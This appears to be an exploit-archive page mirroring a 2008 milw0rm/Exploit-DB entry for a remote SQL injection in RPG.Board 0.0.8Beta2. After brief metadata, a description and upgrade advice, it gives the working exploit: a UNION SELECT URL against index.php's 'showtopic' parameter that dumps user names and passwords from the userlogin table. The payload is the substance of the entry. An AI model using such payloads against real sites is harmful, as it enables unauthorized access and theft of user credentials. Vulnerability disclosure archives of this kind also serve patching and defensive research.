RPG.Board - exploit.company

vendor:

RPG.Board

by:

0x90

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: RPG.Board

Affected Version From: 0.0.8Beta2

Affected Version To: 0.0.8Beta2

Patch Exists: YES

Related CWE: N/A

CPE: a:rpgmaster:rpg.board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

RPG.Board <= 0.0.8Beta2 Remote SQL Injection

A SQL injection vulnerability exists in RPG.Board 0.0.8Beta2. An attacker can send a specially crafted HTTP request to index.php with the parameter 'subtopic' and 'showtopic' to execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of RPG.Board.

Source

Exploit-DB raw data:

    _____          ____   _____    ____   _____   __  __    _____   ____
   /  _  \ /\  /\ / _  \ /  _  \  / ___| /  _  \ /  \/  \  /  _  \ / _  |
   | | | | \ \/ / ||_| | | | | |  | |    | | | | | \__/ |  | |_| | ||_|_|
   | | | |  \  /  \__  | | | | |  | |    | | | | | |  | |  |  _  | |   \
   | |_| |  /  \   __| | | |_| |/\| |__  | |_| | | |  | |/\| | | | | |\ \
   \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_|  |_|\/|_| |_| |_| \_|
           \/  \/

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69

[~] Vulnerability Class: SQL Injection



[~] Exploit:

Register, login and testing exploit..

http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin

# milw0rm.com [2008-09-26]